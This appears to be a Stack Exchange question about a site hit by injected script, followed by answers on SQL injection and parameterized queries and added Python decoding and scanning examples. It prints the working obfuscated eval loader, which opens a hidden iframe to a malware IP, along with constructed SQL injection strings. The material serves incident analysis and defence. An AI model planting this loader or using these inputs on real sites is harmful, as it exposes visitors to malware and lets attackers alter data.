
Sql Injection Attack Insight

The following code is being added to our site. Below it is the effect it has on a page, basically opening an iframe to a malware site. Our site was suffering from this last week, and to fix the issue we just rolled back the database and codebase, and it did. I have a corrupt version I can work with and am searching for where the code came in and how, but I'm coming up with nothing. If it was entered through some form on the site, what might that entry look like in the db? If it modified a file in the codebase, why can't I find it? What should I be looking for? ANY insight into this would be super helpful. I'm trying to figure out where we need to plug up security.

Note: The original script had no line breaks. It is shown here with line breaks to make the code readable:

<script type="text/javascript" charset="utf-8">
    p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!6f!75!65!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!6f!75!65!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!32!31!36!2e!31!31!3@!2e!31!31!34!2e!31!36!34!2f!65!73!64!2e!70!68!70!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!68!6f!75!65!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!68!6f!75!65!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b"
      .replace(/@/g,"9")
      .split("!");
   try{
      document.body&=0.1
   } catch(gdsgsdg) {
      zz=3;
      dbshre=103;
      if(dbshre){
         vfvwe=0;
         try{
            document;
         } catch(agdsg){
            vfvwe=1;
         }
         if(!vfvwe){
            e=eval;
         }
         s="";
         if(zz)
            for(i=0;i-480!=0;i++){
               if(window.document)
                  s+=ss(p(asgq[i],16));
            }
         if(window.document)
            e(s);
      }
   }
</script>

The embedded hex codes resolve to the following Javascript:

(function () {
    var houe = document.createElement('iframe');

    houe.src = 'http://216.119.114.164/esd.php';
    houe.style.position = 'absolute';
    houe.style.border = '0';
    houe.style.height = '1px';
    houe.style.width = '1px';
    houe.style.left = '1px';
    houe.style.top = '1px';

    if (!document.getElementById('houe')) {
        document.write('<div id=\'houe\'></div>');
        document.getElementById('houe').appendChild(houe);
    }
})();

It is injecting div elements such as:

<div id="mgkc"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>

<div id="houe"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
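The hex blob in the injected script can be decoded offline rather than by letting a browser run it. The following Python is an added example, not code from the question or from any of the answers: it reimplements the loader's `replace(/@/g,"9")`, `split("!")`, `parseInt(x,16)`, `String.fromCharCode` transformation, then scans a constructed piece of sample HTML (which embeds the page's exact `asgq` string) for that carrier pattern and pulls the iframe `src` out of the decoded result. The carrier regex, the function names and the sample HTML are assumptions of mine; the same `find_encoded_payloads` call can be pointed at a saved page, a template file or the value of a text column when hunting for where the script was stored.

```python
import re

# The obfuscated payload exactly as it appears in the injected <script> on
# this page (the asgq string from the question).  It is split across lines
# here for readability only; joined it is one string of 480 '!'-separated
# tokens, matching the loader's  for(i=0;i-480!=0;i++)  loop.
ASGQ = (
    "28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a"
    "!20!20!20!20!76!61!72!20!68!6f!75!65!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a"
    "!20!20!20!20!68!6f!75!65!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!32!31!36!2e!31!31!3@!2e!31!31!34!2e!31!36!34!2f!65!73!64!2e!70!68!70!27!3b!d!a"
    "!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a"
    "!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a"
    "!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a"
    "!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a"
    "!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a"
    "!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a"
    "!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2@!20!7b!d!a"
    "!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!68!6f!75!65!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a"
    "!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!68!6f!75!65!2@!3b!d!a"
    "!20!20!20!20!7d!d!a!7d!2@!28!2@!3b"
)


def decode_hex_blob(blob, junk="@", digit="9"):
    """Undo the loader's obfuscation: swap the junk character back to the
    hex digit it replaced, split on '!', and turn every hex token into the
    character it encodes (String.fromCharCode(parseInt(tok, 16)))."""
    tokens = blob.replace(junk, digit).split("!")
    return "".join(chr(int(tok, 16)) for tok in tokens if tok)


# Carrier pattern (assumed regex): a long JS string literal of hex tokens and
# '!' separators, followed by .replace(/X/g,"D").split("!").  Captures the
# blob, the junk character and the digit it stands for.
HEX_BLOB_RE = re.compile(
    r'"([0-9a-fA-F@!]{40,})"\s*\.replace\(\s*/(.)/g\s*,\s*"(.)"\s*\)\s*\.split\("!"\)',
    re.S,
)


def find_encoded_payloads(text):
    """Scan page HTML, a template file or a DB text value for the carrier
    and return every decoded payload found (empty list when clean)."""
    found = []
    for m in HEX_BLOB_RE.finditer(text):
        blob, junk, digit = m.group(1), m.group(2), m.group(3)
        found.append(decode_hex_blob(blob, junk=junk, digit=digit))
    return found


def iframe_sources(js):
    """Pull  something.src = '...'  URLs out of decoded JavaScript; these are
    the indicators to block at the proxy and to search the site for."""
    return re.findall(r"\.src\s*=\s*'([^']+)'", js)


# Constructed sample page: the page's own obfuscated payload inside the
# loader's wrapper, with the decoy try/catch trimmed down.
SAMPLE_HTML = (
    "<html><body><p>Welcome</p>\n"
    '<script type="text/javascript" charset="utf-8">\n'
    'p=parseInt;ss=(123)?String.fromCharCode:0;asgq="' + ASGQ + '"\n'
    '      .replace(/@/g,"9")\n'
    '      .split("!");\n'
    "   try{ document.body&=0.1 } catch(gdsgsdg) { /* loader elided */ }\n"
    "</script>\n</body></html>"
)


def decoded_sample():
    """Decode the payload carried by SAMPLE_HTML."""
    return find_encoded_payloads(SAMPLE_HTML)[0]


if __name__ == "__main__":
    js = decoded_sample()
    print(js)
    print("iframe targets:", iframe_sources(js))
```

The decoded text is the readable `(function () { ... })();` block shown further down in the question; the `\r\n` line endings in the output are what the `!d!a` tokens encode.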

What should I be looking for?

Assuming it is an sql injection problem (and this does sound right), you should be looking in your web application code for something like this:

sql = "SELECT columns FROM SomeTable WHERE SomeColumn=" + someVariable

If you let us know what language you use I might be able to give a more representative example, but the main thing is that anywhere you use string concatenation to put information from the user into an sql query — even if you run it through a function to sanitize, clean, or escape it — you are vulnerable. Note that this isn't even an insert/update/delete statement. It's just a select, and the semantics indicate that the sql is even expecting a numeric type. It doesn't matter: an attacker can still use this to change things in your data.

If you're using an ORM, you might even just be building one part of a WHERE clause, and so it might even just be this:

filter = "SomeDataField='" + someVariable + "'"

The correct way to handle it is using something called parameterized queries or prepared statements, depending on which kids you hang out with on the playground. These use code that looks more like this:

sql = "SELECT columns" + " FROM SomeTable WHERE SomeColumn= ?"
// Other code to define and set a parameter for SomeColumn goes here

Note that I did use string concatenation there (just for show, to demonstrate that you can build up a query this way), but that I did not use it to substitute user input into the query. The important thing to understand here is that using this scheme (if implemented properly), the user input is never substituted directly into the query, not even on the database server. Instead, it's transmitted separately and treated like a variable by the database engine as well.

Again, I might be able to give a better representation if I know what language/platform you're using. As an example (I'll use an UPDATE this time), here's one way to do it safely in C# with Sql Server:

string sql = "UPDATE table SET column= @SomeVariable WHERE ID= @UserID";
using (var cn = new SqlConnection("connection string here"))
using (var cmd = new SqlCommand(sql, cn))
{
    cmd.Parameters.Add("@SomeVariable", SqlDbType.VarChar, 50).Value = someVariable;
    cmd.Parameters.Add("@UserID", SqlDbType.Int).Value = UserID;

    cn.Open();
    cmd.ExecuteNonQuery();
}
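As an added example (not the answerer's code, which is C# against Sql Server), the same contrast in Python with the standard-library `sqlite3` module: the two concatenation patterns quoted in this answer next to their parameterized forms, plus a parameterized UPDATE, all run against a constructed in-memory table. Table and column names follow the answer's placeholders; the sample rows, the test inputs and the function names are assumptions of mine. The point it makes concrete is the one in the answer: with a bound parameter the value is handed to the engine separately, so a value that happens to contain `OR` or a quote is compared as data and matches nothing, whereas the concatenated versions return every row.

```python
import sqlite3


def make_db():
    """In-memory table with constructed sample rows; the names are the
    placeholders used in the answer above."""
    cn = sqlite3.connect(":memory:")
    cn.execute(
        "CREATE TABLE SomeTable ("
        "ID INTEGER PRIMARY KEY, SomeColumn INTEGER, SomeDataField TEXT)"
    )
    cn.executemany(
        "INSERT INTO SomeTable VALUES (?, ?, ?)",
        [(1, 10, "alice"), (2, 20, "bob"), (3, 30, "carol")],
    )
    cn.commit()
    return cn


def lookup_unsafe(cn, someVariable):
    """The numeric-looking SELECT from the answer, built by concatenation.
    Whatever the caller passes becomes part of the SQL text itself."""
    sql = "SELECT ID FROM SomeTable WHERE SomeColumn=" + someVariable
    return [row[0] for row in cn.execute(sql)]


def lookup_safe(cn, someVariable):
    """Same query, parameterized: the '?' is part of the SQL text and the
    value is bound separately, so it can never alter the statement."""
    sql = "SELECT ID FROM SomeTable WHERE SomeColumn=?"
    return [row[0] for row in cn.execute(sql, (someVariable,))]


def filter_unsafe(cn, someVariable):
    """The ORM-style WHERE fragment from the answer, concatenated."""
    filter_ = "SomeDataField='" + someVariable + "'"
    sql = "SELECT ID FROM SomeTable WHERE " + filter_
    return [row[0] for row in cn.execute(sql)]


def filter_safe(cn, someVariable):
    """The same filter with the value bound as a parameter."""
    sql = "SELECT ID FROM SomeTable WHERE SomeDataField=?"
    return [row[0] for row in cn.execute(sql, (someVariable,))]


def update_safe(cn, someVariable, user_id):
    """Parameterized UPDATE, the sqlite3 counterpart of the answer's C#
    SqlCommand example.  Returns the number of rows changed."""
    cur = cn.execute(
        "UPDATE SomeTable SET SomeDataField=? WHERE ID=?",
        (someVariable, user_id),
    )
    cn.commit()
    return cur.rowcount


if __name__ == "__main__":
    cn = make_db()
    hostile_number = "10 OR 1=1"     # constructed input for the numeric query
    hostile_text = "x' OR '1'='1"    # constructed input for the text filter
    print("concatenated numeric:", lookup_unsafe(cn, hostile_number))  # every row
    print("parameterized numeric:", lookup_safe(cn, hostile_number))   # no rows
    print("concatenated filter:", filter_unsafe(cn, hostile_text))     # every row
    print("parameterized filter:", filter_safe(cn, hostile_text))      # no rows
    print("rows updated:", update_safe(cn, "o'brien", 2))              # 1
```

The quote in `o'brien` is the everyday reason to prefer parameters even before thinking about attackers: the concatenated `filter_unsafe` would throw a syntax error on that name, while the bound version stores and later matches it as-is.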

How do the forms on your site interact with your database? Do they create a direct connection to the DB or do they use a web service? If you are executing queries directly on the DB, then you should parameterize your queries.

There are multiple website vulnerability scanners that test for SQL injection and other vulnerabilities on websites. Here is a short list - check https://security.stackexchange.com/questions/32/what-tools-are-available-to-assess-the-security-of-a-web-application/38#38 for a larger one:

Additionally, see these links:

In general, you also need to search for every SQL command within your codebase and verify that no inputs are being sent unsanitized to the database.
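As an added example (not from any of the answers), a small heuristic scanner in Python for the search this answer recommends. It walks source text line by line and flags a line when a string literal that looks like SQL (it contains an SQL keyword, or it ends in `=` or `='` as if waiting for a value) is glued to something else with `+`, `%`, `.format(`, an f-string placeholder or a `${}` template. The sample source is constructed and includes the snippets quoted in the first answer; the regexes are my own triage heuristics, good for producing a review list, not for proving a codebase clean.

```python
import re

# Literal content that looks like SQL: an SQL keyword, or a trailing
# comparison operator waiting for a value ("... WHERE SomeColumn=", "x='").
KEYWORD_RE = re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE)\b", re.I)
OPEN_COMPARISON_RE = re.compile(r"=\s*['\"]?\s*$")

# Double- or single-quoted literals on one line (no escape handling; triage only).
LITERAL_RE = re.compile(r'"([^"\\]*)"|\'([^\'\\]*)\'')

# Ways a literal gets glued to a variable.  Literal-to-literal concatenation
# ("SELECT columns" + " FROM ...") is deliberately NOT matched: the answer
# above uses that form and it is harmless.
GLUE_RES = [
    re.compile(r'["\']\s*\+\s*[^\s"\']'),   # "... WHERE x=" + someVariable
    re.compile(r'[^\s"\']\s*\+\s*["\']'),   # someVariable + "'"
    re.compile(r'["\']\s*%\s*\(?\s*\w'),    # "... %s" % user_id
    re.compile(r'["\']\s*\.format\('),      # "... {}".format(user_id)
    re.compile(r'\bf["\'].*?\{'),           # f"... {user_id}"
    re.compile(r'\$\{'),                    # `... ${userId}` (JS template)
]


def looks_like_sql(literal):
    """True when a string literal's content reads like (part of) a query."""
    return bool(KEYWORD_RE.search(literal) or OPEN_COMPARISON_RE.search(literal))


def scan_source(text):
    """Return (line number, stripped line) for every line that builds
    SQL-looking text by gluing a literal to a variable."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        literals = [a or b for a, b in LITERAL_RE.findall(line)]
        if not any(looks_like_sql(lit) for lit in literals):
            continue
        if any(glue.search(line) for glue in GLUE_RES):
            hits.append((lineno, line.strip()))
    return hits


# Constructed sample: the snippets quoted in the first answer (lines 1-4)
# plus a few other common shapes.  Lines 1, 2, 5 and 6 should be flagged;
# 3 (literal + literal), 4 (named parameters), 7 (bound parameter) and
# 8 (not SQL) should not.
SAMPLE_SOURCE = '''\
sql = "SELECT columns FROM SomeTable WHERE SomeColumn=" + someVariable
filter = "SomeDataField='" + someVariable + "'"
sql = "SELECT columns" + " FROM SomeTable WHERE SomeColumn= ?"
string sql = "UPDATE table SET column= @SomeVariable WHERE ID= @UserID";
cur.execute("DELETE FROM SomeTable WHERE ID = %s" % user_id)
cur.execute(f"SELECT ID FROM SomeTable WHERE SomeDataField = '{name}'")
cur.execute("SELECT ID FROM SomeTable WHERE ID = ?", (user_id,))
log.info("Updated " + str(n) + " rows")
'''


if __name__ == "__main__":
    for lineno, line in scan_source(SAMPLE_SOURCE):
        print(f"{lineno}: {line}")
```

Run it over `git ls-files` output or a directory walk and review every hit by hand; a hit means "a human should look here", and a clean run does not mean the code is safe, since queries assembled across several lines or inside helper functions slip past a one-line heuristic.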
